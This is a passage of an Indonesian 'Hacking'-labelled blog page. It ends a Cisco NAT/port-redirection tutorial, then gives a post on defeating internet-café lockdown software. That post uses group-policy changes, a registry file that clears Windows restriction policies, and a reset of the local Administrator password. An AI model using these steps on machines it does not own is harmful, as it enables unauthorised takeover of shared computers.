IP. Jadi koneksi dari internal host ke 7 akan gagal dan harus menunggu sampai translation mapping timeout dan di clear, sehingga public ip kembali tersedia.<br />Cara mengatasinya, kita bisa bikin pool dgn 5 public IP address, dan 1 IP terakhir buat PAT. IP terakhir, 195.1.134.6 digunakan sbg IP address utk interface s0/0<br />Router(config)#ip nat pool public_IP 195.1.134.1 195.1.134.5 netmask 255.255.255.248<br />Router(config)#ip nat inside source list internal_network pool public_IP<br />Router(config)#ip nat inside source list internal_network interface s0/0 overload<br />Dgn begini, 5 private IP yg pertama akan di translate ke 5 public IP di pool, sedangkan private IP yg lain akan di translate ke ip ke-6, yg merupakan ip address dari interface s0/0.<br />5. Ok, ayo masuk ke contoh yg lebih advance:<br />Kita punya 6 public IP dari range 195.1.134.1.- 195.1.134.6<br />IP address 195.1.134.4 kita gunakan sbg ip address interface s0/0 router kita<br />IP address 195.1.134.1 digunakan oleh router ISP interface s0/0, yg merupakan default gateway router kita<br />IP address 195.1.134.2 mau kita gunakan sbg ip address web server kita, dgn real IP 192.168.1.2<br />Dan IP addres 195.1.134.3 mau kita gunakan sbg ip address mail server kita, dgn real IP 192.168.1.3<br />Sisanya, 195.1.134.5 dan 6, akan kita pergunakan nanti jika kita punya server2 baru<br />- Bikin ACL buat semua network, access-list internal_network permit 192.168.1.0 0.0.0.255<br />- Konfigure PAT buat semua internal network ke interface s0/0<br />Router(config)#ip nat inside source list internal_network interface s0/0 overload<br />- Bikin one-to-one NAT buat web dan mail server<br />Router(config)#ip nat inside source static 192.168.1.2 195.1.134.2<br />Router(config)#ip nat inside source static 192.168.1.3 195.1.134.3<br />Jgn kuatir jika terjadi overlap antara static NAT diatas dgn PAT di konfigurasi sebelumnya. Static NAT akan meng-overide rule utk 192.168.1.2 dan 192.168.1.3, sehingga ke-2 IP tsb tidak akan di PAT meskipun termasuk dlm ACL internal_network.<br />Jgn lupa enable NAT di interface s0/0 dan e0/0 spt contoh no.1<br />Dan kalo kita punya IOS Firewall dan ACL ingress in interface s0/0, maka kita harus permit koneksi dari internet ke public IP web dan mail server kita, dgn port yg terkait spt tcp 80 dan 25. Jadi di ACL ingress s0/0 jgn gunakan real IP address.<br />6. Kita terkoneksi dgn ISP, router kita cuman dapet 1 public IP address buat interface s0/0 tapi punya web server dan mail server? Jgn kuatir, ini bisa dilakukan dgn teknik port redirection.<br />Jadi, bikin dulu PAT biar internal network kita bisa konek ke Internet<br />Router(config)#ip nat inside source list internal_network interface s0/0 overload<br />Trus bikin port redirection buat traffic ke port 80 dan 25, di contoh ini private IP web server kita tetap 192.168.1.2 dan mail server 192.168.1.3<br />Router(config)#ip nat inside source static tcp 192.168.1.2 80 interface s0/0 80<br />Router(config)#ip nat inside source static tcp 192.168.1.3 25 interface s0/0 25<br />Dgn cara begini, traffic yg datang ke public IP interface serial port 80 akan di redirect ke real IP web server 192.168.1.2, dan traffic yg datang ke serial port 25 akan di redirect ke real IP mail server 192.168.1.3<br />Tinggal daftar di public DNS server untuk web dan MX record mail server kita, untuk me-resolve ke public IP router interface s0/0. Keuntungan lain dgn cara PAT ke interface adalah kita bisa saja mendapatkan IP address yg berbeda-beda (dynamic IP) setiap kali konek ke ISP.<br />Dgn setingan di atas, kita tidak perlu kuatir IP kita akan berubah.<br />Hanya mungkin public IP yg kita daftarkan untuk web dan mail server di public DNS server harus selalu di-update sesuai dgn IP address yg sedang kita dapatkan.<br />Mulai kerasakan The Power of NAT?<br /><br /></span> <a href='http://trycahgo.blogspot.com/2009/05/konfigurasi-router-nat-pada-windows.html'>Read More..</a> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Diposting oleh <span class='fn'>try</span> </span> <span class='post-timestamp'> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Label: <a href='http://trycahgo.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <div class='post hentry uncustomized-post-template'> <a name='244648283678239080'></a> <h3 class='post-title entry-title'> <a href='http://trycahgo.blogspot.com/2009/05/trik-jitu-ampuh-menghadapi-billing.html'>TRIK JITU AMPUH MENGHADAPI BILLING EXPLORER YANG MEMATIKAN AKSES BILA SEDANG BERINTERNET</a> </h3> <div class='post-header-line-1'></div> <div class='post-body entry-content'> Sebelumnya saya ucapkan banyak terima kasih buat Jasakom community. Terimakasih buat para hacker mania and cracker mania yang dulu sudah mengajari aku banyak hal, maka ijinkan saya mereview your coretan kembali. Sering kita ke warnet yang banyak mengunci berbagai akses seperti windows explorer tidak bisa dibuka, klik kanan di desktop tidak bisa, klik kanan di folderpun tidak bisa...betapa sedihnyakan... apalagi bagi saya yang telah terbiasa dengan shortcut windows xp, misalnya membuka windows explorer: <br />Win +E, membuka run: Win +R, mencari file di dalam harddisk Win +F, yang mana tombol Win terletak antara <br />tombol Ctrl dan tombol alt. ingin tahu caranya...nih silakan coba... <br />Sebenarnya cara ini telah lama saya coba dan ternyata berhasil (praktek di komputer sendiri dan beberapa warnet yang menggunakan billing explorer) Mohon maaf kepada pembuat Billing Explorer...untuk tidak berpanjang lebar langsung aja ya... <br /><br /><br /><span class="fullpost"><br />==> Pertama Buka GPEdit.msc dulu <br />caranya: <br />C:\Windows\System32\GPEdit.msc <-- double Click <br />1. Jika Klik Kanan di Desktop tidak bisa <br />Masuk Ke GPEdit.msc <br />Masuk ke [User Configuration/Administrative Templates/Desktop] <br />- Disable (Hide and disable all items on the desktop) <br />Jika MyComputer tidak ada <br />- Disable (Remove My Computer icon on the Desktop) <br />2. Jika Ingin mengubah properties pada taskbar start menu <br />masuk ke [User Configuration/Administrative Templates/Start Menu and Taskbar] <br />- Disable (Prevent changes to Taskbar and Start Menu Settings) <br />Jika Menu Run tidak muncul <br />- Disable (Remove Run menu from Start Menu) <br />Jika menu pada taskbar saat klik kanan tidak muncul <br />- Disable (Remove access to the context menus for the taskbar) <br />3. Apabila Control Panel tidak bisa di akses <br />Masuk ke [User Configuration/Administrative Templates/Control Panel] <br />- Disable (Prohibit access to the Control Panel) <br />4. Jika Command Prompt tidak bisa di akses <br />Masuk ke [User Configuration/Administrative Templates/System] <br />- Disable (Prevent access to the command prompt) <br />Jika Registry Editor tidak bisa di akses <br />- Disable (Prevent access to registry editing tools) <br />5. Jika Task Manager tidak bisa di akses <br />Masuk ke [User Configuration/Administrative Templates/System/Ctrl+Alt+Del Options] <br />- Disable (Remove Task Manager) <br />6. Jika Folder Options pada Windows Explorer tidak muncul <br />Masuk ke [User Configuration/Administrative Templates/Windows Component/Windows Explorer] <br />- Disable (Remove these Folder Options menu item from the Tools menu) <br />Jika Windows Key tidak berfungsi <br />- Disable (Turn off Windows+X hotkeys) <br />------------------------------------------- end -------------------------------------------- <br />--------------------------------------- Regedit. --------------------------------------- <br />==> Setelah GPEdit.msc terbuka baru buka Registry Tools <br />caranya: <br />C:\Windows\System32\regedit.exe <-- double Click <br />--- atau --- <br />C:\Windows\regedit.exe <-- double Click <br />------------------------------------------ start. ------------------------------------------ <br />Regedit 4 <br /><br />[HKEY_LOCAL_MACHINE\Software\ResearchMachines\NOATTRIB.VXD] <br />"loadvxd"=dword:00000000 <br /><br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] <br />"NoDrives"=dword:00000000 <br />"LinkResolveIgnoreLinkInfo"=dword:00000000 <br />"NoFolderOptions"=dword:00000000 <br />"ClearRecentDocsOnExit"=dword:00000000 <br />"NoTrayContextMenu"=dword:00000000 <br />"EnforceShellExtensionSecurity"=dword:00000000 <br />"NoPrinterTabs"=dword:00000000 <br />"NoDeletePrinter"=dword:00000000 <br />"NoAddPrinter"=dword:00000000 <br />"NoRun"=dword:00000000 <br />"NoSetFolders"=dword:00000000 <br />"NoSetTaskbar"=dword:00000000 <br />"NoClose"=dword:00000000 <br />"NoViewContextMenu"=dword:00000000 <br /><br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] <br />"DisableRegistryTools"=dword:00000000 <br />"NoDispScrSavPage"=dword:00000000 <br />"NoDispAppearancePage"=dword:00000000 <br />"NoDispSettingsPage"=dword:00000000 <br />"NoAdminPage"=dword:00000000 <br />"NoProfilePage"=dword:00000000 <br />"NoDevMgrPage"=dword:00000000 <br />"NoConfigPage"=dword:0000000 <br />"NoFileSysPage"=dword:00000000 <br />"NoDispCPL"=dword:00000000 <br />"NoDispBackgroundPage"=dword:00000000 <br />"NoVirtMemPage"=dword:00000000 <br /><br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network] <br />"NoFileSharingControl"=dword:00000000 <br />"NoPrintSharingControl"=dword:00000000 <br />"NoNetSetup"=dword:00000000 <br />"NoNetSetupIDPage"=dword:00000000 <br />"NoNetSetupSecurityPage"=dword:00000000 <br />"NoEntireNetwork"=dword:00000000 <br />"NoWorkgroupContents"=dword:00000000 <br /><br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp] <br />"NoRealMode"=dword:00000000 <br />"Disable"=dword:00000000 <br /><br />[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop] <br />"NoHTMLWallPaper"=dword:00000000 <br />"NoChangingWallPaper"=dword:00000000 <br />"NoCloseDragDropBands"=dword:00000000 <br />"NoMovingBands"=dword:00000000 <br />"NoAddingComponents"=dword:00000000 <br />"NoDeletingComponents"=dword:00000000 <br />"NoEditingComponents"=dword:00000000 <br />"NoClosingComponents"=dword:00000000 <br /><br />[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] <br />"NoFolderOptions"=dword:00000000 <br /><br />[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System] <br />"DisableCMD"=dword:00000000 <br />"DisableRegistryTools"=dword:00000000 <br /><br />[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Advanced] <br />"Hidden"=dword:00000000 <br />"HideFileExt"=dword:00000000 <br />"ShowSuperHidden"=dword:00000000 <br />------------------------------------------- end -------------------------------------------- <br />==> Setelah regedit.exe terbuka baru ubah password administrator <-- (Ini yang di tunggu2x) <br />caranya: <br />C:\Windows\System32\compmgmt.msc <-- double Click <br />------------------------------------------ start. ------------------------------------------ <br />Pilih: - Computer Management (Local)/System Tools/Local Users and Groups/User <br />- Klik kanan Administrator -> Set Password <br />- Ketik New Password: ********** <br />Confirm Password: ********** <br />SELESAI DEH!!!!!!!!!!!!! <br />--------------------------------------- Bonus - Bonus --------------------------------------- <br />Jika tidak bisa sama sekali klik kanan di Windows Explorer masih ada trik tertentu <br />caranya: <br />- Masuk ke Folder misalnya: C:/Windows/System32 <br />- Trus klik salah satu file dalam folder itu <br />misalnya: TaskMgr.exe <br />- Kemudian klik menu File pada Win Explorer <br />- Run as... <br />- Klik The following user -> Masukkan passwordnya <br />Username: Administrator <br />Password: ******** <br />- Selesai <br />NB: Cara ini dilakukan jika kita sudah mendapatkan password administrator seperti yang telah <br />kita pelajari di atas. jika semua cara di atas masih ngga bisa jg berarti masih ada cara <br />lain silakan anda temukan sendiri, selamat mencoba <br />Contoh lain2nya dibawah ini........... <br />1. Membuka MSConfig dari Windows Explorer <br />Caranya: <br />C:\WINDOWS\pchealth\helpctr\binaries\MSConfig.exe <br />2. Membuka Sysedit dari Windows Explorer <br />Caranya: <br />C:\Windows\System32\Sysedit.exe <br /><br />3. Membuka Task Manager <br />Caranya: <br />C:\Windows\System32\taskmgr.exe <br />4. Membuka Services.msc <br />Caranya: <br />C:\Windows\System32\services.msc <br />5. Membuka Disk Management System (Melihat Partisi Harddisk) <br />Caranya: <br />C:\Windows\System32\diskmgmt.msc <br />6. Membuka Computer Management Services <br />Caranya: <br />C:\Windows\System32\compmgmt.msc <br />7. Membuka Shortcut to desktop <br />Caranya: <br />C:\Windows\System32\Show Desktop <br />8. Membuka Defragment <br />Caranya <br />C:\Windows\System32\dfrg.msc <br /><br /><br /></span> <a href='http://trycahgo.blogspot.com/2009/05/trik-jitu-ampuh-menghadapi-billing.html'>Read More..</a> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Diposting oleh <span class='fn'>try</span> </span> <span class='post-timestamp'> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> </span> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> Label: <a href='http://trycahgo.blogspot.com/search/label/Hacking' rel='tag'>Hacking</a> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> <!--Can't find substitution for tag [adEnd]--> </div> <div class='blog-pager' id='blog-pager'> <p align='left'><b>Artikel Lainnya Cari Dibawah Ini : </b></p> <style type='text/css'> @import url(http://www.google.com/cse/api/branding.css); </style> <div class='cse-branding-right' style='background-color:#999999;color:#000000'> <div class='cse-branding-form'> <form action='http://www.google.co.id/cse' id='cse-search-box'> <div> <input name='cx' type='hidden' value='partner-pub-3442224118567282:5zmuzz23mub'/> <input name='ie' type='hidden' value='ISO-8859-1'/> <input name='q' size='31' type='text'/> <input name='sa' type='submit' value='Cari Artikel'/> </div> </form> </div> <div class='cse-branding-logo'> <img alt='Google' src='http://www.google.com/images/poweredby_transparent/poweredby_999999.gif'/> </div> <div class='cse-branding-text'> </div> </div> <span id='blog-pager-older-link'> <a class='blog-pager-older-link' href='http://trycahgo.blogspot.com/search/label/Hacking?updated-max=2009-05-17T18:40:00-07:00&max-results=20&start=14&by-date=false' id='Blog1_blog-pager-older-link' title='Postingan Lama'>Postingan Lama</a> </span> <a class='home-link' href='http://trycahgo.blogspot.com/'>Beranda</a> </div> <div class='clear'></div> </div></div> <div id='content-bgbtm'></div> </div> <div id='sidebar-wrapper'> <div id='sidebar1-bgtop'></div> <div class='sidebar section' id='sidebar'><div class='widget HTML' data-version='1' id='HTML11'> <h2 class='title'>Pencarian</h2> <div class='widget-content'> <style type="text/css"> @import url(http://www.google.com/cse/api/branding.css); </style> <div class="cse-branding-right" style="background-color:#999999;color:#000000"> <div class="cse-branding-form"> <form action="http://www.google.co.id/cse" id="cse-search-box"> <div> <input type="hidden" name="cx" value="partner-pub-3442224118567282:5zmuzz23mub" /> <input type="hidden" name="ie" value="ISO-8859-1" /> <input type="text" name="q" size="23" /> <input type="submit" name="sa" value="Cari" /> </div> </form> </div> <div class="cse-branding-logo"> <img src="http://www.google.com/images/poweredby_transparent/poweredby_999999.gif" alt="Google" /> </div> <div class="cse-branding-text"> </div> </div> </div> <div class='clear'></div> </div><div class='widget HTML' data-version='1' id='HTML9'> <div class='widget-content'> <!-- Histats.com START --> <a href="http://www.histats.com" target="_blank" title="blog counter"> <script language="javascript" type="text/javascript"> var s_sid = 969225;var st_dominio = 4; var cimg = 332;var cwi =112;var che =62; </script></a><script language="javascript" src="http://s10.histats.com/js9.js" type="text/javascript"></script> <noscript><a href="http://www.histats.com" target="_blank"> <img border="0" alt="blog counter" src="http://s4.histats.com/stats/0.gif?969225&1"/></a> </noscript> <!-- Histats.com END --> </div> <div class='clear'></div> </div><div class='widget HTML' data-version='1' id='HTML7'> <h2 class='title'>Link</h2> <div class='widget-content'> <a target="_blank" href="http://rapidlibrary.com">Best Rapidshare Search</a> <a href="http://latihan-blog.blogspot.com" target="_blank"><img border="0" alt="latihan-blog.blogspot.com" src="http://i152.photobucket.com/albums/s170/metroyanti/Blog%20templates/latblog4.gif"/></a> <p><a href="http://www.ilmugrafis.com" target="_blank"><img alt="tutorial ilmu grafis indonesia" border="0" vspace="2" title="tutorial desain grafis indonesia" height="60" src="http://www.ilmugrafis.com/images/ilmugrafis.gif" hspace="2" width="120"/></a><br/> <a href="http://www.ilmugrafis.com">ilmugrafis indonesia</a><p></p> <a href="http://www.sulit.com.ph/" target="_blank" title="Buy and Sell Philippines : Sulit.com.ph"><img border="0" width="120" alt="Buy and Sell Philippines : Sulit.com.ph" src="http://st.sulit.com.ph/images/banner1.gif" height="60" title="Buy and Sell Philippines : Sulit.com.ph"/></a> <center><a href="http://blogger-bumen.blogspot.com" target="_blank" title="Komunitas Blogger Kebumen"><img border="0" alt="komunitas blogger kebumen" src="http://i487.photobucket.com/albums/rr238/bibitku/th_BloggerKebumen1.jpg"/></a><br/><small><a href="http://www.bi2t.com" target="_blank">We Love Our City</a></small></center> <center> <a href="http://www.ilmuwebsite.com" target="_blank"> <img border="0" src="http://unair.info/img/iweb.jpg"/></a><br/> <a href="http://www.ilmuwebsite.com" target="_blank"> ilmuwebsite.com</a></center> <a href="http://www.clixsense.com/?2753829"><img style="border: solid 1px;" src="http://www.clixsense.com/static/img/clixsense2.gif"/></a></p> </div> <div class='clear'></div> </div><div class='widget HTML' data-version='1' id='HTML6'> <h2 class='title'>Perlengkapan</h2> <div class='widget-content'> <script src="http://widgets.amung.us/classic.js" type="text/javascript"></script><script type="text/javascript">WAU_classic('dc6512n3gst5')</script> <a href="ymsgr:sendIM?try_cahgo"> <img src="http://opi.yahoo.com/online?u=try_cahgo&m=g&t=2&l=us"/> </a> <a href="http://www.linktiger.com/" title="Broken links checking service - LinkTiger.com"> <img border="0" src="http://www.linktiger.com/images/linktiger.png" alt="Find broken links on your website for free with LinkTiger.com"/></a> <a href="http://www.growurl.com/index.php?ref=23677" target="_blank"><img border="0" width="120" alt="GrowUrl.com - growing your website" src="http://www.growurl.com/images/growurl_button.gif" height="40"/></a> <a href="http://pinoy-blogs.com/"> <img border="0" alt="Pinoy-Blogs.com" src="http://pinoy-blogs.com/gombie.img"/> </a> <script src="http://widgets.technorati.com/t.js" type="text/javascript"> </script> <a style="color:#4261DF" href="http://technorati.com/blogs/{URL}?sub=tr_authority_t_ns" class="tr_authority_t_js">View blog authority</a> <a href="http://blog-masbudi.blogspot.com/" target="_blank"><img border="0" alt="Blog Mas Budi" src="http://s474.photobucket.com/albums/rr101/setyobr_46/setyo-budi.gif" img/></a> <a href new http://blog-masbudi.blogspot.com/="target="> <a href="http://www.trikblog.co.cc" target="_blank"><img border="0" alt="tips dn trk blogger" src="http://i322.photobucket.com/albums/nn428/togu25_bucket/banner1.png"/></a></a href> <!-- Google PageRank Checker www.gealgeol.com start from here --> <div style="line-height: 100%;"> <center> <a href="http://www.gealgeol.com/php/pr" title="Google PageRank Info"><img border="0" alt="Google PageRank Info" src="http://www.gealgeol.com/php/pr.img/wireless.png"/></a> <br/><a style="color: #993333; font: bold 10px verdana; text-decoration: none;" href="http://www.gealgeol.com">www.GealGeol.com</a> </center> </div> <!-- End of Google PageRank Checker www.gealgeol.com --> </div> <div class='clear'></div> </div><div class='widget HTML' data-version='1' id='HTML5'> <h2 class='title'>Mau Belanja ....</h2> <div class='widget-content'> <iframe scrolling="no" style="width:120px;height:240px;" frameborder="0" src="http://rcm.amazon.com/e/cm?t=60mbsblog-20&o=1&p=8&l=as1&asins=B001QFZFS0&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=0000FF&bc1=000000&bg1=FFFFFF&f=ifr" marginheight="0" marginwidth="0"></iframe> </div> <div class='clear'></div> </div><div class='widget HTML' data-version='1' id='HTML2'> <div class='widget-content'> <!-- Begin: http://adsensecamp.com/ --> <script src="http://adsensecamp.com/show/?id=paM0lKQ6nFE%3D&cid=7XbjAIDKIxw%3D&chan=99ZFlpTf1nE%3D&type=4&title=3D81EE&text=000000&background=FFFFFF&border=000000&url=2BA94F" type="text/javascript"> </script> <!-- End: http://adsensecamp.com/ --> </div> <div class='clear'></div> </div></div> <div id='sidebar1-bgbtm'></div> </div> <!-- spacer for skins that want sidebar and main to be the same height--> <div class='clear'> </div> </div> <!-- end content-wrapper --> <div id='footer'> <p class='copyright'>2009 <a href='http://trycahgo.blogspot.com/'>try's blog</a> All Rights Reserved. <a href='http://www.deluxetemplates.net/'>Blogger Templates</a> created by <a href='http://www.deluxetemplates.net/'>Deluxe Templates</a> .</p> <p class='link'>CSS by <a href='http://www.freecsstemplates.org/'>Free CSS Templates</a></p> </div> </div></div> <!-- end outer-wrapper --> <script type="text/javascript" src="https://www.blogger.com/static/v1/widgets/1740399757-widgets.js"></script> <script type='text/javascript'> window['__wavt'] = 'AOuZoY7vhpvPUzwgyX5rR06D6G9P8Nxd0w:1740078244210';_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d3621831370437288404','//trycahgo.blogspot.com/search/label/Hacking','3621831370437288404'); _WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '3621831370437288404', 'title': 'try\x27s blog', 'url': 'http://trycahgo.blogspot.com/search/label/Hacking', 'canonicalUrl': 'http://trycahgo.blogspot.com/search/label/Hacking', 'homepageUrl': 'http://trycahgo.blogspot.com/', 'searchUrl': 'http://trycahgo.blogspot.com/search', 'canonicalHomepageUrl': 'http://trycahgo.blogspot.com/', 'blogspotFaviconUrl': 'http://trycahgo.blogspot.com/favicon.ico', 'bloggerUrl': 'https://www.blogger.com', 'hasCustomDomain': false, 'httpsEnabled': true, 'enabledCommentProfileImages': true, 'gPlusViewType': 'FILTERED_POSTMOD', 'adultContent': false, 'analyticsAccountNumber': '', 'encoding': 'UTF-8', 'locale': 'id', 'localeUnderscoreDelimited': 'id', 'languageDirection': 'ltr', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'isDynamicViewsAvailable': true, 'feedLinks': '\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22try\x26#39;s blog - Atom\x22 href\x3d\x22http://trycahgo.blogspot.com/feeds/posts/default\x22 /\x3e\n\x3clink rel\x3d\x22alternate\x22 type\x3d\x22application/rss+xml\x22 title\x3d\x22try\x26#39;s blog - RSS\x22 href\x3d\x22http://trycahgo.blogspot.com/feeds/posts/default?alt\x3drss\x22 /\x3e\n\x3clink rel\x3d\x22service.post\x22 type\x3d\x22application/atom+xml\x22 title\x3d\x22try\x26#39;s blog - Atom\x22 href\x3d\x22https://www.blogger.com/feeds/3621831370437288404/posts/default\x22 /\x3e\n', 'meTag': '\x3clink rel\x3d\x22me\x22 href\x3d\x22https://www.blogger.com/profile/13128456945878612149\x22 /\x3e\n', 'adsenseClientId': 'ca-pub-3442224118567282', 'adsenseHostId': 'ca-host-pub-1556223355139109', 'adsenseHasAds': false, 'adsenseAutoAds': false, 'boqCommentIframeForm': true, 'loginRedirectParam': '', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/a53efe5a9107f97a', 'plusOneApiSrc': 'https://apis.google.com/js/platform.js', 'disableGComments': true, 'interstitialAccepted': false, 'sharing': {'platforms': [{'name': 'Dapatkan link', 'key': 'link', 'shareMessage': 'Dapatkan link', 'target': ''}, {'name': 'Facebook', 'key': 'facebook', 'shareMessage': 'Bagikan ke Facebook', 'target': 'facebook'}, {'name': 'BlogThis!', 'key': 'blogThis', 'shareMessage': 'BlogThis!', 'target': 'blog'}, {'name': 'X', 'key': 'twitter', 'shareMessage': 'Bagikan ke X', 'target': 'twitter'}, {'name': 'Pinterest', 'key': 'pinterest', 'shareMessage': 'Bagikan ke Pinterest', 'target': 'pinterest'}, {'name': 'Email', 'key': 'email', 'shareMessage': 'Email', 'target': 'email'}], 'disableGooglePlus': true, 'googlePlusShareButtonWidth': 0, 'googlePlusBootstrap': '\x3cscript type\x3d\x22text/javascript\x22\x3ewindow.___gcfg \x3d {\x27lang\x27: \x27id\x27};\x3c/script\x3e'}, 'hasCustomJumpLinkMessage': false, 'jumpLinkMessage': 'Baca selengkapnya', 'pageType': 'index', 'searchLabel': 'Hacking', 'pageName': 'Hacking', 'pageTitle': 'try\x27s blog: Hacking'}}, {'name': 'features', 'data': {}}, {'name': 'messages', 'data': {'edit': 'Edit', 'linkCopiedToClipboard': 'Tautan disalin ke papan klip!', 'ok': 'Oke', 'postLink': 'Tautan Pos'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Khusus', 'isResponsive': false, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\x3dclassic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\x3dflipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\x3dmagazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\x3dmosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\x3dsidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\x3dsnapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\x3dtimeslide'}, 'isMobile': false, 'title': 'try\x27s blog', 'description': '', 'url': 'http://trycahgo.blogspot.com/search/label/Hacking', 'type': 'feed', 'isSingleItem': false, 'isMultipleItems': true, 'isError': false, 'isPage': false, 'isPost': false, 'isHomepage': false, 'isArchive': false, 'isSearch': true, 'isLabelSearch': true, 'search': {'label': 'Hacking', 'resultsMessage': 'Menampilkan postingan dengan label Hacking', 'resultsMessageHtml': 'Menampilkan postingan dengan label \x3cspan class\x3d\x27search-label\x27\x3eHacking\x3c/span\x3e'}}}]); _WidgetManager._RegisterWidget('_NavbarView', new _WidgetInfo('Navbar1', 'navbar', document.getElementById('Navbar1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 'header', document.getElementById('Header1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_ProfileView', new _WidgetInfo('Profile1', 'sidebar2', document.getElementById('Profile1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_LabelView', new _WidgetInfo('Label1', 'sidebar2', document.getElementById('Label1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogArchiveView', new _WidgetInfo('BlogArchive1', 'sidebar2', document.getElementById('BlogArchive1'), {'languageDirection': 'ltr', 'loadingMessage': 'Memuat\x26hellip;'}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML8', 'sidebar2', document.getElementById('HTML8'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML1', 'sidebar2', document.getElementById('HTML1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML4', 'sidebar2', document.getElementById('HTML4'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML3', 'main', document.getElementById('HTML3'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML10', 'main', document.getElementById('HTML10'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML12', 'main', document.getElementById('HTML12'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML13', 'main', document.getElementById('HTML13'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'main', document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'navMessage': 'Tampilkan postingan dengan label \x3cb\x3eHacking\x3c/b\x3e. \x3ca href\x3d\x22http://trycahgo.blogspot.com/\x22\x3eTampilkan semua postingan\x3c/a\x3e', 'lightboxEnabled': true, 'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/1361836472-lbx.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/1964470060-lightbox_bundle.css'}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML11', 'sidebar', document.getElementById('HTML11'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML9', 'sidebar', document.getElementById('HTML9'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML7', 'sidebar', document.getElementById('HTML7'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML6', 'sidebar', document.getElementById('HTML6'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML5', 'sidebar', document.getElementById('HTML5'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML2', 'sidebar', document.getElementById('HTML2'), {}, 'displayModeFull')); </script> </body> </html>